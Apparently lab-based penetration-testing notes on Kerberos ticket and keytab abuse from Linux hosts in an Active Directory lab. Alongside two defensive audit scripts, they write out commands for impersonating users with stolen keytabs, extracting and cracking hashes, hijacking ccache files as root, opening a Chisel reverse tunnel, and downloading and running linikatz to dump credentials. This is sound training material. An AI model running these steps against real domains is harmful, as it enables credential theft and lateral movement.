A Linux computer connected to Active Directory commonly uses Kerberos for authentication.
A Linux machine that is not connected to Active Directory can still use Kerberos tickets in scripts or to authenticate to the network. Being joined to the domain is not a requirement for using Kerberos tickets from a Linux machine.
Kerberos on Linux
By default, Linux machines store Kerberos tickets as ccache files in the /tmp directory.
The location of the Kerberos ticket is stored in the environment variable KRB5CCNAME.
ccache files are protected by read and write permissions, but a user with elevated or root privileges could easily gain access to these tickets.
Another everyday use of Kerberos in Linux is with keytab files.
A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password. However, when you change your password, you must recreate all your keytab files.
Keytab files commonly allow scripts to authenticate automatically using Kerberos without requiring human interaction or access to a password stored in a plain text file.
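To make the keytab description concrete, here is an added example (not code from the original notes) that parses the MIT keytab format version 0x0502 described above: a 2-byte version header, then entries, each prefixed with a signed 32-bit length and holding the principal, a timestamp, a kvno, and a keyblock. It keeps only the principal, enctype, kvno and key length, which is what an administrator needs to inventory keytabs and spot weak enctypes; the key bytes are discarded. The sample keytab, the principal svc_example@EXAMPLE.LOCAL and the zero-filled keys are constructed for the example; the rule that a non-zero trailing 32-bit kvno overrides the 8-bit one is assumed from MIT behaviour.

```python
import struct
import time
from dataclasses import dataclass
from typing import Dict, List

# Common enctype numbers (RFC 3961/3962/4757); anything else is shown numerically.
ENCTYPE_NAMES: Dict[int, str] = {
    1: "des-cbc-crc",
    3: "des-cbc-md5",
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
    23: "arcfour-hmac",  # RC4 key, which is the NT hash itself
}
WEAK_ENCTYPES = {1, 3, 23}


@dataclass
class KeytabEntry:
    principal: str
    name_type: int
    timestamp: int
    kvno: int
    enctype: int
    key_len: int  # only the length is retained; key bytes are dropped on purpose

    def enctype_name(self) -> str:
        return ENCTYPE_NAMES.get(self.enctype, f"enctype-{self.enctype}")


def _counted(buf: bytes, off: int):
    """Read a counted_octet_string: uint16 length followed by that many bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("truncated keytab")
    return buf[off:off + n], off + n


def parse_keytab(data: bytes) -> List[KeytabEntry]:
    """Parse a version 0x0502 keytab into entries without retaining key material."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format version 0x0502 is supported")
    entries: List[KeytabEntry] = []
    off = 2
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size == 0:
            break                 # nothing sensible follows; treat as end of file
        if size < 0:
            off += -size          # negative size marks a deleted slot of |size| bytes
            continue
        end = off + size
        if end > len(data):
            raise ValueError("truncated keytab")
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _counted(data, off)
        comps = []
        for _ in range(ncomp):
            comp, off = _counted(data, off)
            comps.append(comp.decode("utf-8", "replace"))
        name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, off)
        off += 9
        (enctype,) = struct.unpack_from(">H", data, off)
        off += 2
        key, off = _counted(data, off)
        kvno = vno8
        if end - off >= 4:        # optional 32-bit kvno; assumed to win when non-zero
            (vno32,) = struct.unpack_from(">I", data, off)
            if vno32:
                kvno = vno32
        entries.append(KeytabEntry(
            principal="/".join(comps) + "@" + realm.decode("utf-8", "replace"),
            name_type=name_type, timestamp=timestamp, kvno=kvno,
            enctype=enctype, key_len=len(key)))
        off = end
    return entries


def describe(entries: List[KeytabEntry]) -> List[str]:
    """One line per entry in the spirit of `klist -k -t`, flagging weak enctypes."""
    lines = []
    for e in entries:
        when = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(e.timestamp))
        flag = "  [weak enctype]" if e.enctype in WEAK_ENCTYPES else ""
        lines.append(f"{e.kvno:>3} {when} {e.principal} "
                     f"({e.enctype_name()}, {e.key_len}-byte key){flag}")
    return lines


def build_sample_keytab() -> bytes:
    """Constructed two-entry keytab for a made-up principal; keys are zero-filled test data."""
    def counted(b: bytes) -> bytes:
        return struct.pack(">H", len(b)) + b

    def entry(enctype: int, key: bytes, kvno: int) -> bytes:
        body = struct.pack(">H", 1) + counted(b"EXAMPLE.LOCAL") + counted(b"svc_example")
        body += struct.pack(">IIB", 1, 1700000000, kvno)  # name type, timestamp, 8-bit kvno
        body += struct.pack(">H", enctype) + counted(key) + struct.pack(">I", kvno)
        return struct.pack(">i", len(body)) + body

    return b"\x05\x02" + entry(18, b"\x00" * 32, 3) + entry(23, b"\x00" * 16, 3)


if __name__ == "__main__":
    for line in describe(parse_keytab(build_sample_keytab())):
        print(line)
```

Run against a real file with `parse_keytab(open(path, "rb").read())`; the output lists which principals and key versions a keytab carries, so a lingering RC4 key or a key for a principal that should have been rotated stands out without the key material ever being displayed.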
Scenario
LINUX01 ←> MS01 ←> PWNBOX
Linux Auth from MS01 (image)
Linux Auth via Port Forward
ssh david@inlanefreight.htb@10.129.204.23 -p 2222
Identifying Linux and Active Directory Integration
A Linux machine is commonly domain joined using realm, a tool used to manage system enrollment in a domain and to set which domain users or groups are allowed to access the local system resources.
realm - Check If Linux Machine is Domain Joined
realm list
The presence of sssd or winbind also identifies whether the machine is domain joined. We can read this blog post for more details.
PS - Check if Linux Machine is Domain Joined
ps -ef | grep -i "winbind\|sssd"
Finding Kerberos Tickets in Linux
Finding Keytab Files
Using Find to Search for Files with Keytab in the Name
find / -name "*keytab*" -ls 2>/dev/null
Identifying Keytab Files in Cronjobs
Another common place to find keytab files is in automated scripts configured using a cronjob or any other Linux service.
crontab -l
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k --no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
kinit allows interaction with Kerberos, and its function is to request the user's TGT and store this ticket in the cache (ccache file). We can use kinit to import a keytab into our session and act as the user.
Finding ccache Files
A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.
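The cron-job and ccache passages above boil down to three questions an administrator can answer with a script: where KRB5CCNAME points, which krb5cc_* files in /tmp are readable by anyone other than their owner, and which keytabs scheduled scripts pass to `kinit -k -t` and how those are protected. The following is an added example, not code from the original notes. The function names, the regex for the `-t` argument, the EXAMPLE.LOCAL script body and the throwaway directory built by make_constructed_tmp are all constructed for the example; the treatment of the FILE:, DIR:, KEYRING:, MEMORY: and KCM: cache types follows the documented KRB5CCNAME syntax.

```python
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Matches `kinit ... -t <keytab>` on one line; assumes the path is unquoted.
KINIT_KEYTAB_RE = re.compile(r"\bkinit\b[^\n]*?\s-t\s+(\S+)")

# Constructed script body in the shape of the cron job shown above (not a real host's file).
SAMPLE_SCRIPT = """#!/bin/bash
kinit svc_example@EXAMPLE.LOCAL -k -t /opt/example/svc_example.keytab
smbclient //dc01.example.local/share -c 'ls' -k --no-pass > /tmp/results.txt
"""


def ccache_path_from_env(env: Dict[str, str]) -> Optional[str]:
    """Resolve KRB5CCNAME to a filesystem path, or None for cache types with no file."""
    value = env.get("KRB5CCNAME", "")
    if not value:
        return None
    ctype, sep, rest = value.partition(":")
    if not sep or value.startswith("/"):
        return value                      # bare path, implicitly FILE:
    if ctype.upper() in ("FILE", "DIR"):
        return rest
    return None                           # KEYRING:, MEMORY:, KCM: live outside the filesystem


def file_exposure(path) -> Dict[str, object]:
    """Describe, from the mode bits alone, who besides the owner can read a file."""
    st = os.stat(path)
    return {
        "path": str(path),
        "uid": st.st_uid,
        "mode": stat.S_IMODE(st.st_mode),
        "group_readable": bool(st.st_mode & stat.S_IRGRP),
        "world_readable": bool(st.st_mode & stat.S_IROTH),
        "exposed": bool(st.st_mode & (stat.S_IRGRP | stat.S_IROTH)),
    }


def audit_ccache_dir(directory="/tmp") -> List[Dict[str, object]]:
    """Report every krb5cc_* file in the directory; 'exposed' means not owner-only readable."""
    return [file_exposure(p) for p in sorted(Path(directory).glob("krb5cc_*")) if p.is_file()]


def keytab_refs_in_script(text: str) -> List[str]:
    """Return the keytab paths a script or crontab body passes to kinit -t."""
    return KINIT_KEYTAB_RE.findall(text)


def audit_keytab_refs(script_paths) -> List[Dict[str, object]]:
    """For each script, find referenced keytabs and report their exposure, or that they are missing."""
    results = []
    for sp in script_paths:
        text = Path(sp).read_text(errors="replace")
        for kt in keytab_refs_in_script(text):
            if os.path.isfile(kt):
                results.append({**file_exposure(kt), "referenced_by": str(sp)})
            else:
                results.append({"path": kt, "referenced_by": str(sp), "missing": True})
    return results


def make_constructed_tmp() -> str:
    """Build a throwaway directory that mimics /tmp: one safe ccache, one exposed ccache,
    a group-readable keytab and a cron script that references it. Caller removes it."""
    d = tempfile.mkdtemp(prefix="krb-audit-")
    for name, mode in (("krb5cc_1000", 0o600), ("krb5cc_1001_AbCdEf", 0o644)):
        p = os.path.join(d, name)
        with open(p, "wb") as fh:
            fh.write(b"\x05\x04")             # ccache version bytes only, no real ticket
        os.chmod(p, mode)
    keytab = os.path.join(d, "svc_example.keytab")
    with open(keytab, "wb") as fh:
        fh.write(b"\x05\x02")                 # keytab version bytes only, no real key
    os.chmod(keytab, 0o640)
    with open(os.path.join(d, "job.sh"), "w") as fh:
        fh.write(SAMPLE_SCRIPT.replace("/opt/example/svc_example.keytab", keytab))
    return d


if __name__ == "__main__":
    print("KRB5CCNAME ->", ccache_path_from_env(dict(os.environ)))
    for f in audit_ccache_dir("/tmp"):
        print(f"{f['path']} uid={f['uid']} mode={f['mode']:04o} exposed={f['exposed']}")
    d = make_constructed_tmp()
    for r in audit_keytab_refs([os.path.join(d, "job.sh")]):
        print(r)
```

On a real host, point audit_keytab_refs at the scripts named in each user's crontab and at /etc/cron.d; a keytab that is group- or world-readable, or a ccache in /tmp with anything beyond 0600, is exactly the condition the notes above describe as exploitable by a local user, and the report gives the file owner and mode needed to fix it.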
Reviewing Environment Variables for ccache Files.
env | grep -i krb5
Searching for ccache Files in /tmp
ls -la /tmp
Abusing KeyTab Files
Listing keytab File Information
klist -k -t /opt/specialfiles/carlos.keytab
Impersonating a User with a keytab
klist
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
Connecting to SMB Share as Carlos
smbclient //dc01/carlos -k -c ls
Keytab Extract
We can attempt to crack the account's password by extracting the hashes from the keytab file. Let's use KeyTabExtract, a tool to extract valuable information from 502-type .keytab files, which may be used to authenticate Linux boxes to Kerberos.
It retrieves information such as the realm, Service Principal, Encryption Type, and Hashes.
Extracting Keytab Hashes with KeyTabExtract
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
With the NTLM hash, we can perform a Pass the Hash attack. With the AES256 or AES128 hash, we can forge our tickets using Rubeus or attempt to crack the hashes to obtain the plaintext password.
A quick way to crack password hashes is with online repositories such as https://crackstation.net/, which contains billions of passwords.
Log in as Carlos
su - carlos@inlanefreight.htb
Then obtain more hashes.
Abusing Keytab ccache
Privilege Escalation to Root
ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
sudo su
Looking for ccache Files
ls -la /tmp
Identifying Group Membership with the id Command
id julio@inlanefreight.htb
Importing the ccache File into our Current Session
klist
cp /tmp/krb5cc_647401106_I8I133 .
export KRB5CCNAME=/root/krb5cc_647401106_I8I133
klist
smbclient //dc01/C$ -k -c ls --no-pass
Using Linux Attack Tools with Kerberos
Our attack host doesn't have a connection to the KDC/Domain Controller, and we can't use the Domain Controller for name resolution. To use Kerberos, we need to proxy our traffic via MS01 with tools such as Chisel and Proxychains, and edit the /etc/hosts file to hardcode the IP addresses of the domain and the machines we want to attack.
Host File Modified
cat /etc/hosts
# Host addresses
172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01
Proxychains Configuration File
cat /etc/proxychains.conf
<SNIP>
[ProxyList]
socks5 127.0.0.1 1080
Download Chisel to our Attack Host
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
gzip -d chisel_1.7.7_linux_amd64.gz
mv chisel_* chisel && chmod +x ./chisel
sudo ./chisel server --reverse
Connect to MS01 with xfreerdp
xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution
Execute chisel from MS01
c:\tools\chisel.exe client 10.10.14.33:8080 R:socks
Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133
Impacket
Using Impacket with proxychains and Kerberos Authentication
proxychains impacket-wmiexec dc01 -k
Evil-Winrm
Installing Kerberos Authentication Package
sudo apt-get install krb5-user -y
Default Kerberos Version 5 realm
Kerberos Configuration File for INLANEFREIGHT.HTB
cat /etc/krb5.conf
[libdefaults]
default_realm = INLANEFREIGHT.HTB
<SNIP>
[realms]
INLANEFREIGHT.HTB = {
kdc = dc01.inlanefreight.htb
}
<SNIP>
Using Evil-WinRM with Kerberos
proxychains evil-winrm -i dc01 -r inlanefreight.htb
Miscellaneous
If we want to use a ccache file in Windows or a kirbi file in a Linux machine, we can use impacket-ticketConverter to convert them.
Impacket Ticket Converter
impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi
Note: We can do the reverse operation by first selecting a .kirbi file.
Importing Converted Ticket into Windows Session with Rubeus
C:\tools\Rubeus.exe ptt /ticket:c:\tools\julio.kirbi
Linikatz
Linikatz is a tool created by Cisco’s security team for exploiting credentials on Linux machines when there is an integration with Active Directory.
It is the equivalent of Mimikatz for UNIX environments, and it requires root.
This tool will extract all credentials, including Kerberos tickets, from different Kerberos implementations such as FreeIPA, SSSD, Samba, Vintela, etc. Once it extracts the credentials, it places them in a folder whose name starts with linikatz.
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
/opt/linikatz.sh